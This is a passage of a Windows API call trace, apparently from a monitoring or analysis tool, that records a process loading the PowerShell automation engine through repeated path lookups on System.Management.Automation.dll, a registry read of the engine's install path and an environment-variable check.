	[0355.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.536] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbd8 | out: phkResult=0x1cdbd8*=0x358) returned 0x0
	[0355.536] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb5c, lpData=0x0, lpcbData=0x1cdb58*=0x0 | out: lpType=0x1cdb5c*=0x1, lpData=0x0, lpcbData=0x1cdb58*=0x56) returned 0x0
	[0355.536] CoTaskMemAlloc (cb=0x5a) returned 0x408290
	[0355.536] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb2c, lpData=0x408290, lpcbData=0x1cdb28*=0x56 | out: lpType=0x1cdb2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb28*=0x56) returned 0x0
	[0355.536] CoTaskMemFree (pv=0x408290) 
	[0355.536] RegCloseKey (hKey=0x358) returned 0x0
	[0355.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.539] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0355.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.539] CoTaskMemFree (pv=0x436a00) 
	[0355.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
